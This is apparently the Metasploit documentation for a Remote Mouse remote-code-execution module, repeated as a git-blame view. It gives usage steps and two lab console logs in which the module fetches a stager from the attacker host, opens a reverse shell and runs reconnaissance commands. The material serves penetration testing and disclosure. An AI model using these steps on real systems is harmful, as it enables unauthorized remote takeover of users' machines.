documentation/modules/exploit/windows/misc/remote_mouse_rce.md

## Vulnerable Application

This module utilizes the Remote Mouse Server by Emote Interactive protocol
to deploy a payload and run it from the server on versions < 4.200 (500 server response).
This module will deploy
a payload regardless if server authentication is required.
Tested against 4.110, current at the time of module writing

Version 4.110 can be downloaded from
(unofficial site)[https://remote-mouse.en.uptodown.com/windows/download/4546712]
    
## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/remote_mouse_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell as the user who is running Remote Mouse.

## Options

### SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
Defaults to `1`.

### PATH

The path where the payload should be downloaded/staged to. Defaults to `c:\\Windows\\Temp\\`.

## Scenarios

###  Remote Mouse 4.110 on Windows 10

```
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run

[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>whoami 
whoami
win10prolicense\windows

C:\Users\windows>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
```

###  Remote Mouse 4.110 on Windows 10, with a password


```
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > exploit

[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>
```
remote mouse rce 2022-09-27 16:37:42 -04:00			`## Vulnerable Application`

			`This module utilizes the Remote Mouse Server by Emote Interactive protocol`
update remote mouse version checks 2022-10-17 15:30:17 -04:00			`to deploy a payload and run it from the server on versions < 4.200 (500 server response).`
update remote mouse version checks 2022-10-17 15:29:10 -04:00			`This module will deploy`
remote mouse rce 2022-09-27 16:37:42 -04:00			`a payload regardless if server authentication is required.`
			`Tested against 4.110, current at the time of module writing`

update remote mouse version checks 2022-10-17 15:29:10 -04:00			`Version 4.110 can be downloaded from`
			`(unofficial site)[https://remote-mouse.en.uptodown.com/windows/download/4546712]`
remote mouse rce 2022-09-27 16:37:42 -04:00
			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use exploit/windows/misc/remote_mouse_rce`
			4. Set `rhost` and `lhost` as required.
			5. Do: `run`
			`6. You should get a shell as the user who is running Remote Mouse.`

			`## Options`

			`### SLEEP`

			`The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.`
			Defaults to `1`.

review comments 2022-10-03 15:25:53 -04:00			`### PATH`

			The path where the payload should be downloaded/staged to. Defaults to `c:\\Windows\\Temp\\`.

remote mouse rce 2022-09-27 16:37:42 -04:00			`## Scenarios`

			`### Remote Mouse 4.110 on Windows 10`

			```
			`resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce`
			`[*] Using configured payload windows/shell/reverse_tcp`
			`resource (remote_mouse.rb)> set rhosts 192.168.2.95`
			`rhosts => 192.168.2.95`
			`resource (remote_mouse.rb)> set lhost 192.168.2.199`
			`lhost => 192.168.2.199`
			`resource (remote_mouse.rb)> set verbose true`
			`verbose => true`
			`msf6 exploit(windows/misc/remote_mouse_rce) > run`

			`[*] Started reverse TCP handler on 192.168.2.199:4444`
			`[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)`
			`[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411`
			`[*] 192.168.2.95:1978 - Connecting`
			`[*] 192.168.2.95:1978 - Sending Windows key`
			`[*] 192.168.2.95:1978 - Opening command prompt`
			`[*] 192.168.2.95:1978 - Sending stager`
			`[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/`
			`[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging`
			`[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging`
			`[*] 192.168.2.95:1978 - Executing payload`
			`[*] Encoded stage with x86/shikata_ga_nai`
			`[*] Sending encoded stage (267 bytes) to 192.168.2.95`
			`[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400`
			`[*] 192.168.2.95:1978 - Server stopped.`
			`[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target`


			`Shell Banner:`
			`Microsoft Windows [Version 10.0.16299.125]`
			`-----`


			`C:\Users\windows>whoami`
			`whoami`
			`win10prolicense\windows`

			`C:\Users\windows>systeminfo`
			`systeminfo`

			`Host Name: WIN10PROLICENSE`
			`OS Name: Microsoft Windows 10 Pro`
			`OS Version: 10.0.16299 N/A Build 16299`
			```

			`### Remote Mouse 4.110 on Windows 10, with a password`


			```
			`resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce`
			`[*] Using configured payload windows/shell/reverse_tcp`
			`resource (remote_mouse.rb)> set rhosts 192.168.2.95`
			`rhosts => 192.168.2.95`
			`resource (remote_mouse.rb)> set lhost 192.168.2.199`
			`lhost => 192.168.2.199`
			`resource (remote_mouse.rb)> set verbose true`
			`verbose => true`
			`msf6 exploit(windows/misc/remote_mouse_rce) > exploit`

			`[*] Started reverse TCP handler on 192.168.2.199:4444`
			`[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)`
			`[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411`
			`[*] 192.168.2.95:1978 - Connecting`
			`[*] 192.168.2.95:1978 - Sending Windows key`
			`[*] 192.168.2.95:1978 - Opening command prompt`
			`[*] 192.168.2.95:1978 - Sending stager`
			`[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/`
			`[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging`
			`[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging`
			`[*] 192.168.2.95:1978 - Executing payload`
			`[*] Encoded stage with x86/shikata_ga_nai`
			`[*] Sending encoded stage (267 bytes) to 192.168.2.95`
			`[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400`
			`[*] 192.168.2.95:1978 - Server stopped.`
			`[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target`


			`Shell Banner:`
			`Microsoft Windows [Version 10.0.16299.125]`
			`-----`


			`C:\Users\windows>`
			```